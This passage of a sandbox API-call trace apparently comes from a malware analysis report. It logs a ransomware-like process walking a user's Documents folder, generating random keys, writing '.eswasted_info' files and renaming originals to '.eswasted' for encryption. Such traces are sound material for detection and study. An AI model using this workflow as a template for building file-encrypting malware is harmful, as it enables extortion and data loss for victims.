pbBuffer=0x4d91f0) returned 1 [0074.993] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.993] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0074.993] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0074.993] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.002] SetEndOfFile (hFile=0x110) returned 1 [0075.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.004] CloseHandle (hObject=0x110) returned 1 [0075.005] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c7238 | out: hHeap=0x4a0000) returned 1 [0075.005] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f12a8 | out: hHeap=0x4a0000) returned 1 [0075.005] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0075.006] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0075.006] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\rIiISHgAsM7Hl6YS.pdf") returned 79 [0075.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4e1ab8 [0075.006] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.006] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0075.007] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.007] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\rIiISHgAsM7Hl6YS.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\riiishgasm7hl6ys.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.007] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.008] SetEndOfFile (hFile=0x110) returned 1 [0075.008] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.008] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\rIiISHgAsM7Hl6YS.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\riiishgasm7hl6ys.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\rIiISHgAsM7Hl6YS.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\riiishgasm7hl6ys.pdf.eswasted")) returned 1 [0075.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\rIiISHgAsM7Hl6YS.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\riiishgasm7hl6ys.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.009] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0075.009] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x430a [0075.009] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430a) returned 0x2d0000 [0075.009] CloseHandle (hObject=0xf8) returned 1 [0075.011] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0075.011] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0075.012] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.012] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.012] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0075.013] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0075.013] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.145] SetEndOfFile (hFile=0x110) returned 1 [0075.282] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0075.282] CloseHandle (hObject=0x110) returned 1 [0075.284] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0075.284] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e47b0 | out: hHeap=0x4a0000) returned 1 [0075.284] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0075.285] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0075.285] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.285] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZPqBm5Lbj0E7Uv.docx") returned 78 [0075.285] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4e1ab8 [0075.285] lstrcpyW (in: lpString1=0x4e1b54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.285] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.285] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0075.286] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.286] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZPqBm5Lbj0E7Uv.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zpqbm5lbj0e7uv.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.469] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.470] SetEndOfFile (hFile=0xfc) returned 1 [0075.470] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.470] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.470] lstrcpyW (in: lpString1=0x4e1b54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZPqBm5Lbj0E7Uv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zpqbm5lbj0e7uv.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZPqBm5Lbj0E7Uv.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zpqbm5lbj0e7uv.docx.eswasted")) returned 1 [0075.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZPqBm5Lbj0E7Uv.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zpqbm5lbj0e7uv.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.471] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0075.471] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5653 [0075.471] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5653) returned 0x2d0000 [0075.471] CloseHandle (hObject=0xf8) returned 1 [0075.474] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0075.474] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0075.475] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.475] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.475] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0075.475] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0075.475] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.484] SetEndOfFile (hFile=0xfc) returned 1 [0075.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.486] CloseHandle (hObject=0xfc) returned 1 [0075.487] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0075.487] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e49a0 | out: hHeap=0x4a0000) returned 1 [0075.488] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0075.488] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0075.488] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a3gk.ots") returned 52 [0075.489] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x272) returned 0x4e1ab8 [0075.489] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.489] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.489] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0075.489] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.489] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a3gk.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a3gk.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.490] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.491] SetEndOfFile (hFile=0xfc) returned 1 [0075.491] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.491] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.491] lstrcpyW (in: lpString1=0x4e1b20, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a3gk.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a3gk.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a3gk.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a3gk.ots.eswasted")) returned 1 [0075.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a3gk.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a3gk.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0075.493] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.493] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xdd69 [0075.493] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd69) returned 0x2d0000 [0075.493] CloseHandle (hObject=0x100) returned 1 [0075.497] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0075.497] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0075.498] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.498] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.498] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0075.499] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0075.499] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0075.834] SetEndOfFile (hFile=0xfc) returned 1 [0076.035] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.035] CloseHandle (hObject=0xfc) returned 1 [0076.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4df110 | out: hHeap=0x4a0000) returned 1 [0076.038] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.039] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.039] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.039] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afROdswn S4yB.xlsx") returned 62 [0076.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4e1ab8 [0076.039] lstrcpyW (in: lpString1=0x4e1b34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.039] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.040] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.040] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afROdswn S4yB.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afrodswn s4yb.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.041] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.042] SetEndOfFile (hFile=0xfc) returned 1 [0076.042] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.042] lstrcpyW (in: lpString1=0x4e1b34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afROdswn S4yB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afrodswn s4yb.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afROdswn S4yB.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afrodswn s4yb.xlsx.eswasted")) returned 1 [0076.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afROdswn S4yB.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afrodswn s4yb.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.043] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.043] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xb6be [0076.043] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb6be) returned 0x2d0000 [0076.043] CloseHandle (hObject=0x110) returned 1 [0076.067] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0076.068] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.069] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0076.069] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.069] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.070] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.070] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.182] SetEndOfFile (hFile=0xfc) returned 1 [0076.184] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.184] CloseHandle (hObject=0xfc) returned 1 [0076.190] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.190] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f1a10 | out: hHeap=0x4a0000) returned 1 [0076.190] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.191] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.191] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.191] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0w-5mL8nUI0PMiAY4WP.doc") returned 68 [0076.191] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4e1ab8 [0076.191] lstrcpyW (in: lpString1=0x4e1b40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.191] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.191] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.192] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.192] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0w-5mL8nUI0PMiAY4WP.doc.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0w-5ml8nui0pmiay4wp.doc.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.192] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.193] SetEndOfFile (hFile=0xfc) returned 1 [0076.193] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.193] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.193] lstrcpyW (in: lpString1=0x4e1b40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0w-5mL8nUI0PMiAY4WP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0w-5ml8nui0pmiay4wp.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0w-5mL8nUI0PMiAY4WP.doc.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0w-5ml8nui0pmiay4wp.doc.eswasted")) returned 1 [0076.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0w-5mL8nUI0PMiAY4WP.doc.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0w-5ml8nui0pmiay4wp.doc.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.194] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.195] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x11027 [0076.195] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11027) returned 0xb10000 [0076.195] CloseHandle (hObject=0x110) returned 1 [0076.199] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0076.199] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.200] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0076.200] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.200] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.201] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: 